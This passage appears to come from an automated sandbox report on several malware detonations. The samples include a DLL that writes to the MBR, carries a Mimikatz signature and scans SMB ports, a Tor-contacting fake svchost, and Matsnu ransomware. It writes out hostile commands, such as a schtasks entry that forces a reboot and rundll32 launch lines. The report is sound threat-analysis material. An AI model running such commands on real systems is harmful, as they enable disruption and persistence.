File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\EXITEM.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REPORT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKREQ.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\XmlFile.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SplashScreen.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDRESN.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SHARING.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REC.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SMIMES.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\firefox.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\CGMIMP32.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFRES.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\RESEND.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\SAMPLES\SOLVSAMP.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Resource.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\MDIParent.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgePackages.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\AccessWeb\SERVWRAP.ASP C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\DISTLIST.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.c C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\EmptyDatabase.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Text.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\en-US\eula.rtf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Visualizer.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SettingsInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\ACTIVITY.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfigInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\MDIParent.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Form.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SECREC.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKDEC.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\EmptyDatabase.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Explorer.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrome.7z C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCallbacks.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Interface.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDREST.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AssemblyInfoInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jvmticmlr.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.PPT C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\APPT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\DOC.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REPLTMPL.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\RSSITEM.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dataset.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Internet Explorer\en-US\eula.rtf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\RCLRPT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\UserControl.zip C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\027cc450ef5f8c5f653329641ec1fed9 C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\dllhost.dat C:\Windows\SysWOW64\rundll32.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\5B4A.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2184 wrote to memory of 2608 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2184 wrote to memory of 2608 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2184 wrote to memory of 2608 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2184 wrote to memory of 2608 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2184 wrote to memory of 2608 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2184 wrote to memory of 2608 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2184 wrote to memory of 2608 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2608 wrote to memory of 2548 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 2608 wrote to memory of 2548 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 2608 wrote to memory of 2548 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 2608 wrote to memory of 2548 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 2608 wrote to memory of 2624 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\5B4A.tmp
PID 2608 wrote to memory of 2624 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\5B4A.tmp
PID 2608 wrote to memory of 2624 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\5B4A.tmp
PID 2608 wrote to memory of 2624 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\5B4A.tmp
PID 2548 wrote to memory of 2720 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2548 wrote to memory of 2720 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2548 wrote to memory of 2720 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2548 wrote to memory of 2720 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed9.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed9.dll,#1

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 23:35

C:\Users\Admin\AppData\Local\Temp\5B4A.tmp

"C:\Users\Admin\AppData\Local\Temp\5B4A.tmp" \\.\pipe\{CF38BF34-BED4-4563-88D5-7D0D4F83C435}

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 23:35

Network

Country Destination Domain Proto
N/A 10.127.0.0:445 tcp
N/A 10.127.0.0:139 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.1:139 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.2:139 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.3:139 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.4:139 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.5:139 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.6:139 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.7:139 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.8:139 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.9:139 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.10:139 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.11:139 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.12:139 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.13:139 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.14:139 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.15:139 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.16:139 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.17:139 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.18:139 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.19:139 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.20:139 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.21:139 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.22:139 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.23:139 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.24:139 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.25:139 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.26:139 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.27:139 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.28:139 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.29:139 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.30:139 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.31:139 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.32:139 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.33:139 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.34:139 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.35:139 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.36:139 tcp
N/A 10.127.0.37:445 tcp

Files

memory/2608-0-0x0000000000290000-0x00000000002EE000-memory.dmp

memory/2608-8-0x0000000000290000-0x00000000002EE000-memory.dmp

memory/2608-9-0x0000000000290000-0x00000000002EE000-memory.dmp

memory/2608-11-0x0000000000290000-0x00000000002EE000-memory.dmp

\Users\Admin\AppData\Local\Temp\5B4A.tmp

MD5 7e37ab34ecdcc3e77e24522ddfd4852d
SHA1 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf
SHA256 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f
SHA512 1b037a2aa8bf951d2ffe2f724aa0b2fbb39c2173215806ba0327bda7b096301d887f9bb7db46f9e04584b16aa6b1aaeaf67f0ecf5f20eb02ceac27c8753ca587

memory/2608-26-0x0000000000290000-0x00000000002EE000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-11-28 22:32

Reported

2024-11-28 22:35

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

Signatures

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepad.lnk C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File created C:\Windows\assembly\Desktop.ini C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
File opened for modification C:\Windows\assembly\Desktop.ini C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\assembly C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
File created C:\Windows\assembly\Desktop.ini C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
File opened for modification C:\Windows\assembly\Desktop.ini C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 101.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 dist.torproject.org udp
DE 116.202.120.165:443 dist.torproject.org tcp
US 8.8.8.8:53 165.120.202.116.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
DE 116.202.120.165:443 dist.torproject.org tcp
US 8.8.8.8:53 71.209.201.84.in-addr.arpa udp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
US 8.8.8.8:53 106.209.201.84.in-addr.arpa udp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
US 8.8.8.8:53 69.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp

Files

memory/4016-0-0x00007FFC7EF05000-0x00007FFC7EF06000-memory.dmp

memory/4016-1-0x00007FFC7EC50000-0x00007FFC7F5F1000-memory.dmp

memory/4016-2-0x000000001D5D0000-0x000000001DA9E000-memory.dmp

memory/4016-3-0x000000001DB40000-0x000000001DBDC000-memory.dmp

memory/4016-4-0x000000001DC50000-0x000000001DCB2000-memory.dmp

memory/4016-5-0x000000001BF70000-0x000000001BF78000-memory.dmp

memory/4016-6-0x000000001E2F0000-0x000000001E342000-memory.dmp

memory/4016-14-0x00007FFC7EC50000-0x00007FFC7F5F1000-memory.dmp

memory/4016-15-0x00007FFC7EF05000-0x00007FFC7EF06000-memory.dmp

memory/4016-16-0x00007FFC7EC50000-0x00007FFC7F5F1000-memory.dmp

memory/4016-17-0x00007FFC7EC50000-0x00007FFC7F5F1000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-28 22:32

Reported

2024-11-28 22:35

Platform

win10v2004-20241007-en

Max time kernel

92s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe

"C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2588 -ip 2588

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 368

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 98.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 92.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-11-28 22:32

Reported

2024-11-28 22:35

Platform

win7-20240903-en

Max time kernel

149s

Max time network

148s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1

Signatures

Mimikatz

mimikatz

Mimikatz family

mimikatz

mimikatz is an open source tool to dump credentials on Windows

Description Indicator Process Target
N/A N/A N/A N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\E4F2.tmp N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A N/A N/A

Reads user/profile data of web browsers

spyware stealer

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\OOFTMPL.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\RESEND.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDRESP.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Settings.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\UserControl.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Web Server Extensions\14\BIN\1033\FPEXT.MSG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.PPT C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\POSTIT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDREQ.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\SettingsInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\LoginForm.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.c C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\jvm.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\deploy\ffjcext.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REMOTE.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SECURE.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\SynchronizationEula.rtf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\IPM.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AppConfigurationInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861261279.profile.gz C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Form.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\MDIParent.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\OMSMMS.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Internet Explorer\en-US\eula.rtf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDCNCL.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SplashScreen.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCallbacks.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REPLTMPL.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REPORT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\SAMPLES\SOLVSAMP.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240811.profile.gz C:\Windows\SysWOW64\rundll32.exe N/A
